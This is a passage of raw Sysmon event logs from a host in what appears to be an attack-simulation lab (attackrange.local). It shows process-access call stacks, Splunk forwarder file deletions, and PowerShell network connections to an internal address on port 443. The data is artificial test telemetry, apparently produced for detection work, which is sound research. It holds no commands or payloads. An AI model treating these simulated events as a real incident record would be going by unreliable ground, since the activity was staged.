21:52:10.983{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127174Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:10.983{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127173Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:10.983{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127172Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:10.983{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-820A-613A-A296-03000000C801}5548C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127171Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:10.983{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-820A-613A-A296-03000000C801}5548C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127170Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:10.968{B81B27B7-820A-613A-A296-03000000C801}5548C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127169Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:10.582{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A68386105F8BD44BDE829288AB105F17,SHA256=92F3A19D8B29C9BEC19F9F9CC2A395123E5799EB4CEE9AA067A3DD1E33B5DB3D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127168Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:10.536{B81B27B7-820A-613A-A196-03000000C801}68005552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127167Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:10.383{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-820A-613A-A196-03000000C801}6800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127166Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:10.383{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127165Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:10.383{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127164Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:10.383{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127163Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:10.383{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127162Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:10.383{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-820A-613A-A196-03000000C801}6800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127161Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:10.383{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-820A-613A-A196-03000000C801}6800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127160Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:10.368{B81B27B7-820A-613A-A196-03000000C801}6800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035127159Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:34.815{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61991-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127180Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:11.583{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BED0526618015AE28A9718B4AFF4C36,SHA256=1C5D3FBAD0DABF00AC74ADD66F88C233596630CA779D80CB686E712789CC0882,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127179Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:11.398{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CC6DB7D5148CAB59D6BF9CCF736F9E0,SHA256=A73E8EFF92BC145E3C3A9ED9C791D0EC8499D51B981624DB4F15F00B3F349A21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127178Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:11.398{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=58C3773DECBDC318ECC141512FF8EC61,SHA256=710AD07377353D0177B040539ADE857880930DAE6813AA3F45187B47F8D1F695,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127181Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:12.597{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBB604E063825C9C15CA12970ADD15AD,SHA256=F3EF45F3B28D667F17B431EE94F7D00B978E823E20438E1C4C918199525390D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127183Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:13.598{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DECACB12887019F19A8A5FB3BC55168F,SHA256=9BA59CE812957A039A13B96FF7A9E80631EC1FE93FBC914A6283079A683A3703,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127182Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:38.375{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61992-false10.0.1.12-8000- 23542300x800000000000000035127185Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:14.797{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E40797378A1DD9EF217004DF60484AAB,SHA256=F96608258E5CD363EBCD9C7015C4FA86B192F5EC0F5D0CDFC6E61CD56E4A4F5E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127184Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:14.615{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51E362489EC8C9752CF6D6BDA328CBA5,SHA256=D5446A4169F508DA1FF536077072ECB3DF03DC86736B84958DE3A7194CDE5D2C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127187Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:15.659{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CCEDB9DA7049A4A95DFF988A0292948,SHA256=4F7F86FCCA885D935F1D6DE26C91B496F2D4F59FA4406716132D32B34DAB6EB3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127186Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:39.829{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61993-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127188Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:16.665{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E8D00FA21675DAC298A20A7705D7D98,SHA256=FB1135E05458B96E6F1533E8E93636744677AA9F0B50AF8F63254DE46DE6A8D3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127189Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:17.679{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A37E21F7C69B0B19253274B9FC43A4EE,SHA256=E15CA83059D8837344C37F38AB20166BB6FFF73AE85BDC28A98D1DC039E37D03,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127191Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:18.712{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6B7CF98AA7EF96DEC3236AF80262A8B,SHA256=ABAA5D0B327609D82F0F19A94F7E3FD589FE0AD73FF85A403F41149E99FCBB7B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127190Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:43.426{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61994-false10.0.1.12-8000- 23542300x800000000000000035127192Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:19.778{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FD7FCC4D4C63BFDF262D6B3A5DD41BF,SHA256=225A339A9BDAB4D34740019C8D784345C717495B04B0575F175115ACB040A055,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127194Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:20.792{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D40B94FEEE255D7769BE3838FF38975B,SHA256=48D0C13CA203BD449A97A40BE636F71A2656D94BEAC7022A82B2305101B46B8A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127193Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:20.692{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9FA96A1991586CA5CC33188123CA076D,SHA256=00035F4A47746B9877DD7312C838BCE921E81E8545341B4E5D02BABCB1BC3857,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127195Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:21.809{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7223EC88998976877BE9B31611E0C00C,SHA256=B0F8D7A532F194A0D9C9E1BE3F91DF11C6D6FC3A754D30D0CDA9976F97614D22,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127197Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:22.859{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E53A305813077F28A1DABA4AA9D7AA60,SHA256=E5229482247DA8F93A3E285D1C3E2C7FA815BBEAAFDE4BB407A50C828C5AE565,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127196Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:45.840{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61995-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127198Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:23.890{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49957FFBD397DBF4336FC20CF90CC505,SHA256=A4CA49458D566C87B3DED871908680BE580A9D827EDAAAEE8CCE076F58D648CC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127199Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:24.908{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E8CBEC5EACF0A713F58355CA68E5B33,SHA256=8DE7537E6A24492F1FC95C61B9D8F86521B5FE8C9498A3732820C09B55DB36F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127201Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:25.927{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 